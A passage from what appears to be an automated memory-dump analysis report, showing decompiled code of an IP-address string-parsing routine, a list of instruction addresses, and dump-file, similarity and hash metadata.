                                                                                                                                                                						_t127 = 1;
                                                                                                                                                                						goto L36;
                                                                                                                                                                					}
                                                                                                                                                                					if(_t167 >= 0x80) {
                                                                                                                                                                						L7:
                                                                                                                                                                						if(_t167 == 0x3a) {
                                                                                                                                                                							_t158 = 0;
                                                                                                                                                                							if(_v12 > 0 || _v8 > 6) {
                                                                                                                                                                								break;
                                                                                                                                                                							} else {
                                                                                                                                                                								_t119 =  &(_t164[1]);
                                                                                                                                                                								if( *_t119 != _t167) {
                                                                                                                                                                									_v8 = _v8 + 1;
                                                                                                                                                                									L13:
                                                                                                                                                                									_v20 = _t158;
                                                                                                                                                                									goto L14;
                                                                                                                                                                								}
                                                                                                                                                                								if(_v28 != 0) {
                                                                                                                                                                									break;
                                                                                                                                                                								}
                                                                                                                                                                								_v28 = _v8 + 1;
                                                                                                                                                                								_t143 = 2;
                                                                                                                                                                								_v8 = _v8 + _t143;
                                                                                                                                                                								goto L47;
                                                                                                                                                                							}
                                                                                                                                                                						}
                                                                                                                                                                						if(_t167 != 0x2e || _a7 != 0 || _v12 > 2 || _v8 > 6) {
                                                                                                                                                                							break;
                                                                                                                                                                						} else {
                                                                                                                                                                							_v12 = _v12 + 1;
                                                                                                                                                                							_t158 = 0;
                                                                                                                                                                							goto L13;
                                                                                                                                                                						}
                                                                                                                                                                					}
                                                                                                                                                                					if(E0202685D(_t167, 4) != 0) {
                                                                                                                                                                						_v16 = _v16 + 1;
                                                                                                                                                                						goto L19;
                                                                                                                                                                					}
                                                                                                                                                                					if(E0202685D(_t167, 0x80) != 0) {
                                                                                                                                                                						_v16 = _v16 + 1;
                                                                                                                                                                						if(_v12 > 0) {
                                                                                                                                                                							break;
                                                                                                                                                                						}
                                                                                                                                                                						_a7 = 1;
                                                                                                                                                                						goto L19;
                                                                                                                                                                					}
                                                                                                                                                                					goto L7;
                                                                                                                                                                				}
                                                                                                                                                                				 *_a8 = _t164;
                                                                                                                                                                				if(_v12 != 0) {
                                                                                                                                                                					if(_v12 != 3) {
                                                                                                                                                                						goto L29;
                                                                                                                                                                					}
                                                                                                                                                                					_v8 = _v8 + 1;
                                                                                                                                                                				}
                                                                                                                                                                				if(_v28 != 0 || _v8 == 7) {
                                                                                                                                                                					if(_v20 != 1) {
                                                                                                                                                                						if(_v20 != 2) {
                                                                                                                                                                							goto L29;
                                                                                                                                                                						}
                                                                                                                                                                						 *((short*)(_a12 + _t136 * 2)) = 0;
                                                                                                                                                                						L65:
                                                                                                                                                                						_t105 = _v28;
                                                                                                                                                                						if(_t105 != 0) {
                                                                                                                                                                							_t98 = (_t105 - _v8) * 2; // 0x11
                                                                                                                                                                							E02008980(_a12 + _t98 + 0x10, _a12 + _t105 * 2, _v8 - _t105 + _v8 - _t105);
                                                                                                                                                                							_t110 = 8;
                                                                                                                                                                							E01FFDFC0(_a12 + _t105 * 2, 0, _t110 - _v8 + _t110 - _v8);
                                                                                                                                                                						}
                                                                                                                                                                						return 0;
                                                                                                                                                                					}
                                                                                                                                                                					if(_v12 != 0) {
                                                                                                                                                                						if(_v16 > 3) {
                                                                                                                                                                							goto L29;
                                                                                                                                                                						}
                                                                                                                                                                						_t114 = E0202EE02(_v24, 0, 0xa);
                                                                                                                                                                						_t170 = _t170 + 0xc;
                                                                                                                                                                						if(_t114 > 0xff) {
                                                                                                                                                                							goto L29;
                                                                                                                                                                						}
                                                                                                                                                                						 *((char*)(_v12 + _t136 * 2 + _a12)) = _t114;
                                                                                                                                                                						goto L65;
                                                                                                                                                                					}
                                                                                                                                                                					if(_v16 > 4) {
                                                                                                                                                                						goto L29;
                                                                                                                                                                					}
                                                                                                                                                                					_t115 = E0202EE02(_v24, 0, 0x10);
                                                                                                                                                                					_t170 = _t170 + 0xc;
                                                                                                                                                                					 *((short*)(_a12 + _t136 * 2)) = _t115;
                                                                                                                                                                					goto L65;
                                                                                                                                                                				} else {
                                                                                                                                                                					goto L29;
                                                                                                                                                                				}
                                                                                                                                                                			}

























                                                                                                                                                                0x0202fd21
                                                                                                                                                                0x0203a3a1
                                                                                                                                                                0x00000000
                                                                                                                                                                0x0203a3a1
                                                                                                                                                                0x0202fd36
                                                                                                                                                                0x0204200b
                                                                                                                                                                0x02042012
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00000000
                                                                                                                                                                0x02042018
                                                                                                                                                                0x00000000
                                                                                                                                                                0x02042018
                                                                                                                                                                0x00000000
                                                                                                                                                                0x0202fd36
                                                                                                                                                                0x0202fe0f
                                                                                                                                                                0x0202fe16
                                                                                                                                                                0x0203a3ad
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00000000
                                                                                                                                                                0x0203a3b3
                                                                                                                                                                0x0203a3b3
                                                                                                                                                                0x0202fe1f
                                                                                                                                                                0x0205ed25
                                                                                                                                                                0x0205ed86
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00000000
                                                                                                                                                                0x0205ed91
                                                                                                                                                                0x0205ed95
                                                                                                                                                                0x0205ed95
                                                                                                                                                                0x0205ed9a
                                                                                                                                                                0x0205edad
                                                                                                                                                                0x0205edb3
                                                                                                                                                                0x0205edba
                                                                                                                                                                0x0205edc4
                                                                                                                                                                0x0205edc9
                                                                                                                                                                0x00000000
                                                                                                                                                                0x0205edcc
                                                                                                                                                                0x0205ed2a
                                                                                                                                                                0x0205ed55
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00000000
                                                                                                                                                                0x0205ed61
                                                                                                                                                                0x0205ed66
                                                                                                                                                                0x0205ed6e
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00000000
                                                                                                                                                                0x0205ed7d
                                                                                                                                                                0x00000000
                                                                                                                                                                0x0205ed7d
                                                                                                                                                                0x0205ed30
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00000000
                                                                                                                                                                0x0205ed3c
                                                                                                                                                                0x0205ed43
                                                                                                                                                                0x0205ed4b
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00000000

APIs
Memory Dump Source
• Source File: 00000009.00000002.2371265151.0000000001FE0000.00000040.00000001.sdmp, Offset: 01FD0000, based on PE: true
• Associated: 00000009.00000002.2371260420.0000000001FD0000.00000040.00000001.sdmp
• Associated: 00000009.00000002.2371338809.00000000020C0000.00000040.00000001.sdmp
• Associated: 00000009.00000002.2371344209.00000000020D0000.00000040.00000001.sdmp
• Associated: 00000009.00000002.2371349487.00000000020D4000.00000040.00000001.sdmp
• Associated: 00000009.00000002.2371354968.00000000020D7000.00000040.00000001.sdmp
• Associated: 00000009.00000002.2371360264.00000000020E0000.00000040.00000001.sdmp
• Associated: 00000009.00000002.2371398748.0000000002140000.00000040.00000001.sdmp
Similarity
• API ID: __fassign
• String ID:
• API String ID: 3965848254-0
• Opcode ID: cf2859dc65627fbf80b6c0eada531fd5cb93d2a8787631212c3d4041a421bf55
• Instruction ID: b0c7772537fca2ef34c89f5c3128e6e89e1d359bf612113e64e33e2a10c3b628
• Opcode Fuzzy Hash: cf2859dc65627fbf80b6c0eada531fd5cb93d2a8787631212c3d4041a421bf55
• Instruction Fuzzy Hash: 30919031D0032AEADF26CF58C8487EEBBF5EF45348F20806BD845A6591E7705B49EB91
Uniqueness

Uniqueness Score: -1.00%